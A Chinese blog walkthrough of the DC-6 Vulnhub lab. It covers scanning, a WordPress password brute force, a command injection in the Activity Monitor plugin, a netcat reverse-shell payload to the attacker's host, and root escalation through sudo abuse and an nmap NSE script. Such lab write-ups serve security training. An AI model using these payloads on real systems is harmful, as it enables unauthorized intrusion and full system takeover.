2022渗透测试-一次完整的渗透测试(DC-6靶场)

简介: 2022渗透测试-一次完整的渗透测试(DC-6靶场)

 DC靶场的下载、安装与访问在上一篇的文章中。

网络异常,图片无法展示
|

靶场攻略:

1、使用nmap快速扫描的命令:

nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24

image.gif

识别到靶场主机ip

image.gif编辑

2.使用命令:

nmap -A -p- -T4 192.168.120.138

image.gif

探测靶场突破口,探测到开放了80端口-http服务,22端口-ssh服务。image.gif编辑

3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://wordy/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。

Windows:可以访问本地hosts,打开C:\Windows\System32\drivers\etc,修改hosts文件。

image.gif编辑

Linux:在/etc/hosts文件中添加域名。

打开浏览器,访问即可。

image.gif编辑 4.如图,可以得知网页用wordpress搭建,可以尝试wpscan进行扫描获得网站用户名。

image.gif编辑

wpscan --url wordy -e u

image.gif

image.gif编辑

扫出了五个用户,将五个用户保存在一个文件user.txt里,如图所示。

image.gif编辑

靶机作者的提示

image.gif编辑

使用提示的命令生成一个字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image.gif

使用wpscan进行爆破

wpscan --url wordy -U user.txt -P passwords.txt

image.gif

image.gif编辑

爆破出一组密码mark/helpdesk01。

image.gif编辑

6.使用dirb进行网站目录扫描

dirb http://wordy  /usr/share/wordlists/dirb/big.txt

image.gif

扫描出登陆页面

http://wordy/wp-admin/

image.gif

image.gif编辑

7.用刚刚爆破出来的账号密码进行登录。

image.gif编辑

在插件中,找到一个存在漏洞的插件Activity monitor

image.gif编辑

根据漏扫说明,在插件的tools界面,存在命令执行漏洞,可以利用进行反弹shell

image.gif编辑

使用BP进行抓包,在ip参数后加入要执行的命令,成功执行。

image.gif编辑

kali使用命令:nc -lvvp 1234开始监听。

brup修改参数 127.0.0.1 | nc -e /bin/bash 192.168.120.129 1234

image.gif编辑

成功接收到反弹的shell。

输入命令:python -c "import pty;pty.spawn('/bin/bash')",得到一个交互shell。

image.gif编辑

使用命令:ls -alhR /home,列出/home目录下的所有文件,发现几个隐私文件

image.gif编辑

在things-to-do.txt文件中,我们看到了账号和密码。

image.gif编辑

通过ssh进行登录,成功登录。

image.gif编辑

使用命令:sudo -l

image.gif编辑

我们发现graham可以用jens的身份执行 /home/jens/backups.sh,把 /bin/bash追加到这个文件,然后用jens的身份执行这个文件的时候就会打开一个具有jens权限的shell

cd /home/jens
echo '/bin/bash' >> backups.sh
sudo -u jens ./backups.sh

image.gif

执行 sudo -l查看一下有没有可以提权的命令。

image.gif编辑

发现可以用root权限执行nmap,nmap在早期版本是可以用来提权的,我们来尝试一下nmap提权。将提权代码 os.execute("/bin/sh")写入一个文件中。

echo 'os.execute("/bin/sh")' > rootshell.nse

image.gif

然后以root的权限用nmap执行这个脚本:

sudo nmap --script=rootshell.nse

image.gif

现在就已经提权成功了,可以读取最后的flag了。

cd /root
cat theflag.txt

image.gif

image.gif编辑

相关文章
|
2月前
|
安全 测试技术
BOSHIDA DC电源模块的安全性能评估与测试方法
BOSHIDA DC电源模块的安全性能评估与测试方法
 BOSHIDA DC电源模块的安全性能评估与测试方法
|
2月前
|
安全 Shell 网络安全
基于Vulnhub靶场—DC4渗透测试过程
Vulhub是一个开源项目,专注于安全漏洞的复现和学习。包括Web应用、容器和操作系统漏洞。项目特点包括丰富的漏洞场景、详细的复现指南、便捷的环境部署和持续更新。通过Vulhub,安全从业者可以学习和研究漏洞利用技术。此外,文章还介绍了如何下载和搭建Vulhub靶机DC-4,并详细描述了利用Burp Suite进行密码爆破和命令执行,最终获取root权限的过程。
87 0
|
2月前
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
探讨AC/DC电源模块的可靠性设计和测试方法
|
2月前
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA AC/DC电源模块的可靠性设计与测试方法
BOSHIDA  AC/DC电源模块的可靠性设计与测试方法
|
2月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
38 0
|
2月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
36 0
|
2月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
35 0
|
2月前
|
安全 Shell 网络安全
基于Vulnhub靶场之DC-3渗透测试过程
Vulhub靶场介绍: [Vulhub](https://vulhub.org/) 是一个专注于安全漏洞复现和学习的开源项目。它提供了各种常见漏洞的复现环境,帮助网络安全从业者学习和研究漏洞利用技术。这些环境涵盖了Web应用、容器和操作系统等多个领域。Vulhub 的特点包括: 1. **丰富的漏洞场景**:覆盖多种常见的漏洞,如SQL注入、XSS等。 2. **详细复现指南**:为每个漏洞场景提供详细的环境搭建和利用步骤,便于学习和实践。 3. **易于使用**:提供一键部署或Docker镜像,简化环境搭建过程 4. **持续更新与维护**:项目在GitHub上开源,不断接收社区的贡献和更新
101 0
|
14天前
|
JSON JavaScript 测试技术
Postman接口测试工具详解
Postman接口测试工具详解
25 1
|
3天前
|
XML JSON 测试技术
Postman接口测试工具详解
📚 Postman全攻略:API测试神器!📚 发送HTTP请求,管理集合,写测试脚本,集成CI/CD。从安装配置到环境变量、断言、数据驱动测试,一步步教你如何高效测试RESTful API。实战案例包含GET、POST、PUT、DELETE请求。用Newman在命令行跑集合,自动化测试不发愁!👉 [洛秋小站](https://www.luoqiu.site/) 学更多!🚀
13 1